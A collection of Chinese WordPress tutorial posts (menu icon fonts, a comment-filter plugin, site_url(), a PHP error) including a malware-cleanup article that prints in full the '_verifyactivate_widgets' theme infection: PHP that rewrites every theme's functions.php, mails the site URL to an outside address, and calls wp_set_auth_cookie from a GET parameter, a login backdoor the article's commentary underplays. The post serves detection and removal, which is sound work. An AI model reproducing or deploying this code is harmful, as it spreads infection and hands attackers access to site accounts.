专业WORDPRESS主题设计制作

WordPress菜单图标CSS怎么添加?安装WP导航图标字体插件(wordpress 菜单)

发布于: 2022-11-03

1 如何使用图标字体?

  • 2 注意事项

 

新媒体人做SEO就是在给网站优化和提升用户体验。

你可以在WordPress网站上,添加图标字体,非常美观,支持响应式设计的WP主题模板。

图标字体和小图像格式的图标不同:

  • 支持视网膜显示.
  • 可以无限放大。
  • 将导航菜单上的项目分别个性化为Icon字体。

具体效果图,可查看我们网站的导航菜单。

如何使用图标字体?

第 1 步:安装插件

  • WP后台 → 插件 → 安装插件 → 搜索“Font Awesome 4 Menus”,下载并安装并启用;
  • 你也可以直接在网站上下载,然后上传后通过FTP上传或安装。

第 2 步:寻找图标字体

点此前往 图标字体官方网站

打开图标字体官方网站,找到我们需要的图标 ▼

search-home-font-awesome

  • 你可以在单击图标时显示的 <i class =“fa fa-home”> </ i>复制 fa fa-home。
  • 如果主页图标名称为home,那么我们需要在 “菜单CSS类” 中输入 fas fa-home

第 3 步:菜单输入CSS类字体图标

  • WP后台 → 外观 → 菜单,进入菜单设置页面。
  • 选择并编辑一个菜单项,
  • 在CSS类中,粘贴我们刚刚复制的图标字体名称(fa fa-home) ▼

font-awesome-home

  • (其他图标的操作是相同的)
  • 最后点击保存可以。

注意事项

如果在编辑菜单项面板中没有CSS类,则可以打开右上角的 “显示选项”,并在显示菜单的高级属性中,选中“CSS类” ▼

menu-css-class

  • 当然,这个图标字体库不限于在导航菜单中使用,只要将相应的图标代码添加到主题模板的相应位置即可。

希望我们网站( https://www.wordpressx.com/ ) 分享的《WordPress菜单图标CSS怎么添加?安装WP导航图标字体插件》,对您有帮助。

WordPress主题如何清理恶意代码_verifyactivate_widgets(wordpress修改主题代码)

发布于: 2022-11-03

1 WordPress主题function.php文件里的恶意代码

 

最近我们在使用Wordfence Security安全插件扫描网站恶意代码之后,发现了WordPress主题的function.php文件里,隐藏恶意病毒代码。

WordPress主题function.php文件里的恶意代码

 

WordPress中“恶意代码”最有可能出现的地方是主题目录下的function.php,通常是隐藏在function.php文件的结尾。

主要问题:该恶意代码会在每次有人访问你的博客页面时,检测当前博客下的所有主题是否都被感染,如果没有,就会一起被感染。

之后在执行wp的初始化动作init的时候,会检查当前博客是否有发邮件到邮箱 [email protected]gmail. com

怎么知道是否发了?

  • 在你的wp_options表 里面有一个名为_is_widget_active_的选项,如果已经发送成功,则将其值设置为1;
  • 如果没有,则以当前被感染博客的主页URL作为标题和内容。
  • 仅此而已,没有做其它坏事了。

恶意病毒代码如下(可能会有一些差异,但基本代码是一样的):

<?php
function _verifyactivate_widgets(){
//当前文件名,如/path-to-www/wp-content/themes/SimpleDark/functions.php
//查找当前主题functions.php文件中最后一个 <? 标记,从这个标记的位置开始,取得一直到文件尾的内容
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),“<“.“?”));
$output=“”;
$allowed=“”;
//去除html和php标签,其实这一句是扯蛋。。。
$output=strip_tags($output, $allowed);
//取得主题目录themes的绝对路径,如 /path-to-www/wp-content/themes
//为了加强程序的兼容性,它不惜以这种很晦涩的方式来获取。。。
//以主题目录themes的绝对路径用array包裹为参数传递给_get_allwidgets_cont函数获取此博客的所有主题的functions.php文件的绝对路径
$direst=_get_allwidgets_cont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),“themes”) + 6)));
if (is_array($direst)){
foreach ($direst as $item){
//如果主题functions.php文件可写
if (is_writable($item)){
//特征码
$ftion=substr($widget,stripos($widget,“_”),stripos(substr($widget,stripos($widget,“_”)),“(“));
//取目标functions.php文件内容
$cont=file_get_contents($item);
//没找到特征码?OK,试图感染
if (stripos($cont,$ftion) === false){
//查看目标functions.php文件最后是否是以 ?> 结尾,如果不是,给加上 ?> 标记
$comaar=stripos( substr($cont,-20),”?”.”>”) !== false ? “” : “?”.”>”;
//这里的代码是忽悠人了,模仿WP widgets的代码,蛊惑你的眼睛,让你觉得这是widget代码。。。
$output .= $before . “Not found” . $after;
//如果文件是以 ?> 标记结尾的,连标记一起取过来
if (stripos( substr($cont,-20),”?”.”>”) !== false){$cont=substr($cont,0,strripos($cont,”?”.”>”) + 2);}
//开始感染,$widget内容即是恶意代码自身,在functions.php文件原内容后附加恶意代码
$output=rtrim($output, “nt”); fputs($f=fopen($item,”w+”),$cont . $comaar . “n” .$widget);fclose($f);
//后面这句也是伪装用的
$output .= ($isshowdots && $ellipsis) ? “…” : “”;
}
}
}
}
return $output;
}
function _get_allwidgets_cont($wids,$items=array()){
//从$wids数组弹出一个元素(实际上是一个位置)
$places=array_shift($wids);
//如果位置字串是以/结尾的,则去掉/
if(substr($places,-1) == “/”){
$places=substr($places,0,-1);
}

//若不存在这样的文件或目录则直接返回false
if(!file_exists($places) || !is_dir($places)){
return false;
}elseif(is_readable($places)){
//否则的话。。。嘿嘿
//遍历此目录
$elems=scandir($places);
foreach ($elems as $elem){
if ($elem != “.” && $elem != “..”){
//如果是目录,则加入$wids数组
if (is_dir($places . “/” . $elem)){
$wids[]=$places . “/” . $elem;
} elseif (is_file($places . “/” . $elem)&&
$elem == substr(__FILE__,-13)){
//否则,如果是文件,并且文件名等于 functions.php的话,则加入到$items数组保存,这才是它的目的functions.php正是它要找的
$items[]=$places . “/” . $elem;}
}
}
}else{
return false;
}
//下面还有子目录?再找找看,递归
if (sizeof($wids) > 0){
return _get_allwidgets_cont($wids,$items);
} else {
//好了,完事了,以数组返回所有找到的functions.php文件的绝对路径
return $items;
}
}

//下面是3个针对低版本的php而写的兼容函数
if(!function_exists(“stripos”)){
function stripos( $str, $needle, $offset = 0 ){
return strpos( strtolower( $str ), strtolower( $needle ), $offset );
}
}

if(!function_exists(“strripos”)){
function strripos( $haystack, $needle, $offset = 0 ) {
if( !is_string( $needle ) )$needle = chr( intval( $needle ) );
if( $offset < 0 ){
$temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );
}
else{
$temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) – $offset ), 0 ) ) );
}
if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE;
$pos = ( strlen( $haystack ) – ( $found + $offset + strlen( $needle ) ) );
return $pos;
}
}
if(!function_exists(“scandir”)){
function scandir($dir,$listDirectories=false, $skipDots=true) {
$dirArray = array();
if ($handle = opendir($dir)) {
while (false !== ($file = readdir($handle))) {
if (($file != “.” && $file != “..”) || $skipDots == true) {
if($listDirectories == false) { if(is_dir($file)) { continue; } }
array_push($dirArray,basename($file));
}
}
closedir($handle);
}
return $dirArray;
}
}

//这个动作添加了,用于检测所有主题目录下functions.php并感染
add_action(“admin_head”, “_verifyactivate_widgets”);

function _getprepare_widget(){
if(!isset($text_length)) $text_length=120;
if(!isset($check)) $check=”cookie”;
if(!isset($tagsallowed)) $tagsallowed=”<a>“;
if(!isset($filter)) $filter=”none”;
if(!isset($coma)) $coma=””;
if(!isset($home_filter)) $home_filter=get_option(“home”);
if(!isset($pref_filters)) $pref_filters=”wp_”;
if(!isset($is_use_more_link)) $is_use_more_link=1;
if(!isset($com_type)) $com_type=””;
if(!isset($cpages)) $cpages=$_GET[“cperpage”];
if(!isset($post_auth_comments)) $post_auth_comments=””;
if(!isset($com_is_approved)) $com_is_approved=””;
if(!isset($post_auth)) $post_auth=”auth”;
if(!isset($link_text_more)) $link_text_more=”(more…)”;
if(!isset($widget_yes)) $widget_yes=get_option(“_is_widget_active_”);
if(!isset($checkswidgets))
//这个实际是wp_set_auth_cookie
$checkswidgets=$pref_filters.”set”.”_”.$post_auth.”_”.$check;
if(!isset($link_text_more_ditails)) $link_text_more_ditails=”(details…)”;
if(!isset($contentmore)) $contentmore=”ma”.$coma.”il”;
if(!isset($for_more)) $for_more=1;
if(!isset($fakeit)) $fakeit=1;
if(!isset($sql)) $sql=””;

//如果 _is_widget_active_ option内容为空,即表示没有被感染过
if (!$widget_yes) :

global $wpdb, $post;
//取出存在已经通过的评论(不包括trackback/pingback)的文章
// post_author 为 [email protected] 的文章,肯定是没有的

$sq1=”SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=”1” AND comment_type=”” AND post_author=”li”.$coma.”vethe”.$com_type.”mas”.$coma.”@”.$com_is_approved.”gm”.$post_auth_comments.”ail”.$coma.”.”.$coma.”co”.”m” AND post_password=”” AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count”;#
if (!empty($post->post_password)) {
if ($_COOKIE[“wp-postpass_”.COOKIEHASH] != $post->post_password) {
if(is_feed()) {
$output=__(“There is no excerpt because this is a protected post.”);
} else {
$output=get_the_password_form();
}
}
}
if(!isset($fixed_tags)) $fixed_tags=1;
if(!isset($filters)) $filters=$home_filter;
//$gettextcomments实际上为 wp_mail
if(!isset($gettextcomments)) $gettextcomments=$pref_filters.$contentmore;
if(!isset($tag_aditional)) $tag_aditional=”div”;

//这里$sh_cont即为 [email protected]
if(!isset($sh_cont)) $sh_cont=substr($sq1, stripos($sq1, “live”), 20);#
if(!isset($more_text_link)) $more_text_link=”Continue reading this entry”;
if(!isset($isshowdots)) $isshowdots=1;

$comments=$wpdb->get_results($sql);
if($fakeit == 2) {
$text=$post->post_content;
} elseif($fakeit == 1) {
$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
} else {
$text=$post->post_excerpt;
}
//开始调用 wp_mail 向 [email protected] 发送邮件,标题和内容都是被感染的博客的URL 地址
$sq1=”SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=”1” AND comment_type=”” AND comment_content=”. call_user_func_array($gettextcomments, array($sh_cont, $home_filter, $filters)) .” ORDER BY comment_date_gmt DESC LIMIT $src_count”;#
if($text_length < 0) {
$output=$text;
} else {
if(!$no_more && strpos($text, “<span id=“more-5265”></span>“)) {
$text=explode(“<span id=“more-5675”></span>“, $text, 2);
$l=count($text[0]);
$more_link=1;
//执行这一句时就开始发邮件了。
$comments=$wpdb->get_results($sql);
} else {
$text=explode(” “, $text);
if(count($text) > $text_length) {
$l=$text_length;
$ellipsis=1;
} else {
$l=count($text);
$link_text_more=””;
$ellipsis=0;
}
}
for ($i=0; $i<$l; $i++)
$output .= $text[$i] . ” “;
}
//把感染标记置为1
update_option(“_is_widget_active_”, 1);
if(“all” != $tagsallowed) {
$output=strip_tags($output, $tagsallowed);
return $output;
}
endif;
$output=rtrim($output, “sntrx0B”);
$output=($fixed_tags) ? balanceTags($output, true) : $output;
$output .= ($isshowdots && $ellipsis) ? “…” : “”;
//$filter 为 none …,又是在伪装
$output=apply_filters($filter, $output);
switch($tag_aditional) {
case(“div”) :
$tag=”div”;
break;
case(“span”) :
$tag=”span”;
break;
case(“p”) :
$tag=”p”;
break;
default :
$tag=”span”;
}

//$checkswidgets即是wp_set_auth_cookie
if ($is_use_more_link ) {
if($for_more) {
$output .= ” <” . $tag . ” class=”more-link”><a href=””. get_permalink($post–>ID) . “#more-” . $post->ID .”” title=”” . $more_text_link . “”>” . $link_text_more = !is_user_logged_in() && @call_user_func_array($checkswidgets,array($cpages, true)) ? $link_text_more : “” . “</a></” . $tag . “>” . “n”;
} else {
$output .= ” <” . $tag . ” class=”more-link”><a href=””. get_permalink($post–>ID) . “” title=”” . $more_text_link . “”>” . $link_text_more . “</a></” . $tag . “>” . “n”;
}
}
return $output;
}

//这里是用来干坏事的,这才是这个恶意代码的目的,前面的感染是“准备活动”
add_action(“init”, “_getprepare_widget”);


//这个函数也是用来伪装的,无恶意
function __popular_posts($no_posts=6, $before=”<li>“, $after=”</li>“, $show_pass_post=false, $duration=””) {
global $wpdb;
$request=”SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS ”comment_count” FROM $wpdb->posts, $wpdb->comments”;
$request .= ” WHERE comment_approved=”1” AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=”publish””;
if(!$show_pass_post) $request .= ” AND post_password =”””;
if($duration !=””) {
$request .= ” AND DATE_SUB(CURDATE(),INTERVAL “.$duration.” DAY) < post_date “;
}
$request .= ” GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts”;
$posts=$wpdb->get_results($request);
$output=””;
if ($posts) {
foreach ($posts as $post) {
$post_title=stripslashes($post->post_title);
$comment_count=$post->comment_count;
$permalink=get_permalink($post->ID);
$output .= $before . ” <a href=”” . $permalink . “” title=”” . $post_title.“”>” . $post_title . “</a> ” . $after;
}
} else {
$output .= $before . “None found” . $after;
}
return $output;
}
?>

WordPress主题恶意代码有哪些?

如果使用Wordfence Security安全插件扫描确定你的function.php文件被篡改了,需要检查一下,例如:

tag汇总1(tag信息)
  1. _verifyactivate_widgets
  2. function _checkactive_widgets
  3. function _get_allwidgets_cont
  4. function stripos
  5. function strripos
  6. function scandir
  7. function _getprepare_widget
  8. function __popular_posts
  9. add_action(“admin_head”, “_checkactive_widgets”);
  10. add_action(“init”, “_getprepare_widget”);
  11. _verify_isactivate_widgets
  12. _check_isactive_widget
  13. _get_allwidgetscont
  14. _prepare_widgets
  15. __popular_posts
  • 每一行都是独立的,如果你的functions.php中有以上代码,那么你可能会被击中。
  • 其中,functions和add_action一般是属于“准备活动”的“恶意代码”的代码。

如何清除WordPress主题function.php恶意病毒代码?

清理起来也很简单,只要在WordPress主题的function.php文件中,找到上面类似的代码并删除即可,但是因为一旦被感染,你的themes主题目录下的所有主题会被感染,所以只清除当前使用的主题是无效的,清除后很快就会生成。

解决方法是清除一个WordPress主题的恶意病毒代码后,将functions.php文件设置为444权限,然后清除其它WordPress主题。

至于最后一个functions.php文件的444权限是否需要改回来,们人建议444还是比较安全的,需要修改的时候可以修改。

Wordfence Security插件使用的注意事项

我们推荐 Wordfence Security 的 WordPress 插件,一个集成了防火墙和恶意代码扫描的 WordPress 安全插件,由一个大型团队构建和维护,100% 专注于 WordPress 安全。

虽然有付费模块,但我们可以使用免费模块“扫描”来扫描我们的WordPress网站,检查包含“恶意代码”的PHP文件,虽然有一定的误报率(主要是一些正版插件, 主题加密组件会被误报),但查找“恶意代码”肯定是事半功倍。

需要注意的是,这个插件不建议经常开启,因为它的防火墙和安全防护会对数据库造成一定的负载压力,影响网站的性能。

通常,启用插件以在需要时运行“扫描”扫描。

排查完毕后关闭插件,以备不时之需。

希望我们网站( https://www.wordpressx.com/ ) 分享的《WordPress主题如何清理恶意代码_verifyactivate_widgets》,对您有帮助。

WordPress网站如何过滤敏感词?Cat Comment Filter插件(wordpress过滤敏感词代码)

发布于: 2022-11-03

1 WordPress敏感词过滤插件Cat Comment Filter

  • 1.1 安装Cat Comment Filter插件
  • 2 如何设置Cat Comment Filter插件?
    • 2.1 php敏感词过滤设置
    • 2.2 如何设置转换内容自动过滤敏感词?
    • 2.3 cat-comment-filter敏感词过滤插件设置建议
  • 3 注意事项

在中国做网络推广的SEO人员,都需要给网站进行公安备案。

如果你的WordPress网站空间,是处于在中国大陆境内,就需要给网站备案。

  • 大多数网站备案的时候,都是用于公共安全备案的“非交互式”网站。
  • 但是在公共安全备案的描述中,只要它不是纯展示的网站,例如 :具备留言系统、评论系统的网站都是交互式网站。
  • 所以,很多站长给网站备案,一般是使用交互式备案,因此需要去当地公安局网监部门进行备案。

我们在网络监管中了解到,网站的网络监管部门,总体要求只有一件事:

  • 即网站组织者,需要仔细查看用户在网站上留下的内容。
  • 因此,在我们的日常管理中,除了网站管理员和文案编辑者之类的手动查看方法之外;
  • 我们还可以通过程序,自动检查这些敏感内容,以进行过滤。

WordPress敏感词过滤插件Cat Comment Filter

接下来,我们网站将介绍此插件。

Cat-Comment-Filter是由中国软件开发者大猫制作的WordPress内容过滤插件。

它可以过滤一些不能出现在评论和文章中的敏感词。

该插件非常强大,甚至支持正则表达式。

安装Cat Comment Filter插件

经过测试,之前似乎可以在WordPress后台 → 插件 →安装插件,搜索“Cat-Comment-Filter”直接启用并安装该WordPress插件。

但因为太久没有更新了,WordPress插件官网上提示:

该插件尚未经过WordPress的最新3个主要版本的测试。与更新版本的WordPress一起使用时,可能不再受到维护或支持,并且可能会存在兼容性问题。

  • 所以,现在可能无法直接在网站后台搜索“Cat-Comment-Filter”关键词快速安装该插件。

不过,我们可以通过下载WordPress插件到电脑里,然后将该插件上传到WordPress网站后台。

点此进入 WordPress官网下载 Cat Comment Filter 插件

如何设置Cat Comment Filter插件?

安装插件激活完成后,找到“大猫评论内容关键字过滤设置” ▼

cat-comment-filter-1

如果想过滤的敏感词是英文字母,因为有大小写字母,最好是使用正则表达式给网站过滤敏感词。

可以直接访问WordPress网站程序的插件目录的 ereg.php 输入正则表达式。

php敏感词过滤设置

cat-comment-filter-2

  • 由于受到 PHP 提交限制和数据库写入的特殊字符转译,所以正则表达式暂不提供后台编辑功能,请直接访问插件目录下的 ereg.php 填入正则表达式。
  • ereg.php 的写入方式为:“表达式”,”替换内容”,”表达式”,”替换内容”,”表达式”,”替换内容”这样,请注意,最后一个替换内容后面不加逗号。
  • 正则表达式请使用标准 PHP 规则编写。

如何设置转换内容自动过滤敏感词?

由于cat-comment-filter插件自带的敏感词数据库里,有很多网络营销从业者常用的非敏感词,比如:推广、引流、赚钱之类……

若是如此,cat-comment-filter插件自带的敏感词数据库就不好用了……

cat-comment-filter-3

cat-comment-filter敏感词过滤插件设置建议

  1. 在“转换内容”里的“自带”,选择“否”;
  2. 在“转换内容”里的“自定义”和“正则表达式”,选择“是”;
  3. 在“转换内容”里的“全部”,选择“否”。
  4. 最后,点击“保存设置”,也就完成了。

如何给WordPress网站过滤敏感词呢?

  • 希望以上Cat Comment Filter插件自动过滤敏感词的设置方法,对你有帮助。
  • 现在就安装Cat Comment Filter插件,自动过滤WordPress网站敏感词吧!

注意事项

Cat Comment Filter插件只适合PHP5.6版本,在升级PHP7.4之后会出现错误提示 ▼

FOUND 4 ERRORS AFFECTING 1 LINE
————————————————-
11 | ERROR | Extension ‘ereg’ is deprecated since PHP 5.3 and removed since PHP 7.0; Use pcre instead
11 | ERROR | Function ereg_replace() is deprecated since PHP 5.3 and removed since PHP 7.0; Use preg_replace() instead
11 | ERROR | Extension ‘ereg’ is deprecated since PHP 5.3 and removed since PHP 7.0; Use pcre instead
11 | ERROR | Function eregi_replace() is deprecated since PHP 5.3 and removed since PHP 7.0; Use preg_replace() instead

我们可以改用Text Filtering插件:

点此进入 WordPress官网下载 Text Filtering插件

  • 不过,Text Filtering插件只支持文章关键词自动过滤,不支持评论自动过滤关键词,所以最好是对网站评论进行审核。

希望我们网站( https://www.wordpressx.com/ ) 分享的《WordPress网站如何过滤敏感词?Cat Comment Filter插件》,对您有帮助。

site_url()函数(urllib2函数)

发布于: 2022-08-19

用法

<?php site_url( $path, $scheme ); ?>

默认用法

<?php echo site_url(); ?>

实例

$ url = site_url();
echo $ url;

输出:http://www.example.com或http://www.example.com/wordpress (注意缺少尾部斜杠)
$ url = site_url('/secrets/','https');
echo $ url;

输出:https://www.example.com/secrets/或https://www.example.com/wordpress/secrets/

site_url() 指向WordPress核心文件的 URL,也就是你的wordpress安装路径。
如果你的 WordPress 核心文件在你的服务器的子目录中,比如 /wordpress,那么 site_url() 的值就会是 http://www.phpvar.com/wordpress 。
在控制面板==>> 设置 ==>> WordPress 地址(URL)中可进行修改。
返回的是数据库中 wp_options 表里面的 siteurl 字段值。
(在非不得已的情况下不要修改,一般在安装成功后这个值是自动生成。修改错误的地址会导致页面打不开,后台管理也进不去,出现这种情况只能通过修改数据库来修复。)

home_url()就是首页地址,主要用在需要返回首页的时候。比如logo的链接,“面包屑”的“首页”链接等等。

site_url()函数

site_url() 返回wordpress安装路径,主要用在文件路径的获取,如获得test.jpg图片文件绝对路径拼接:site_url().”/images/test.jpg”。

解决WordPress出现”call_user_func_array() expects”错误(wordpress安装出错)

发布于: 2022-09-19

在宝塔日志中常出现上述错误,会写入非常多的错误日志内容,那么怎么才能去掉这个呢? 一个简单的办法就是屏蔽掉错误输出。

从报错看,应该是新版本可能与PHP兼容报错问题,因为这个服务器WEB环境一直没有升级,还是早期的PHP5.2,这个确实有点陈旧。要么升级PHP,要么就临时解决关闭报错。

解决WordPress出现"call_user_func_array() expects"错误

这里在php.ini文件中,将display_errors报错提醒修改成OFF,然后重启PHP之后,我们再看看就可以解决这个问题。

 

TAG列表 wordpress最新最热TG汇集,掌握wordpress热线内容
wp-json漏洞wordpress感谢页面bootstrap自适应布局WooCommerce 功能Better Search Replace插件WordPress过滤敏感词插件CWP控制面板转KLOXO-MR修改wordpress登录地址WordPress站内搜索排除所有页面http://www.fandutaoci.cnWordPress tag模版CWP开启Redis缓存WordPress网站恶意代码WordPress滤敏感词过滤插件主机壳WordpressnameCheap最新优惠码WordPress超级菜单Image Sizes插件Redis加速缓存插件namechep续费优惠码WordPress自定义页眉Featured Image From URLWooCommerce 商店namechep域名优惠码WP插件优化head代码WordPress违禁词检查wordpress打开是代码wp-json优化Jetpack插件WordPress网站防护Mega Menu插件wordpress表单跳转隐藏WordPress后台登录地址Wordfence Security插件WordPress外链特色图片WP SMTP插件百度熊掌号WP安全登录插件推荐wordpress文章卡片样式安装WordPress插件WordPress页脚页眉插件什么是 WooCommerceWordPress站内搜索排除某些类别的文章WordPress网站安全防WordPress tagwordpress小图标不显示wp-json防止数据被采集robots.txt禁止访问xmlrpc.php漏洞WordPress自动备份wordpress更换域名图标不显示去除tag标签urlFooter and Post Injections插件wordpress描文本wordpress cdnWooCommerce 定价保护robots.txtWordPress官网制作wp-json链接wordpress常规设置Jetpack站点加速器CDN图像缓存网站添加CDNAwesome SupportWordPress显示运行数据库WordPress大气的样式BackWPup插件WordPress文章描文本Easy WP Cleaner插件谷歌 SEOwp-json安全设置WooCommerceh5自适应布局WordPress页脚加载JSWordPress菜单自定义图标WordPress调试模式wordpress文章浏览数量统计WP SMTP插件设置wordpress漏洞修复Avada主题wordpress安全防护WordPress虚拟主机伪静态xmlrpc.php攻击隐藏WordPress代码内版本号Avada主题演示wordpress Post ViewsShortcodes Ultimate插件Rich Snippets结构化数据Dropbox上传失败robots.txt安全设置critical automatic updatesAll In One WP Security扒站怎么改wordpress主题织梦采集侠wordpressWordPress广告词检测禁用 xmlrpc.phpMarkdown here插件Shortcodes UltimateWP-No-Tag-Base插件Pretty Links Pro插件wordpress Dropbox
服务电话:
0533-2765967

微信 13280692153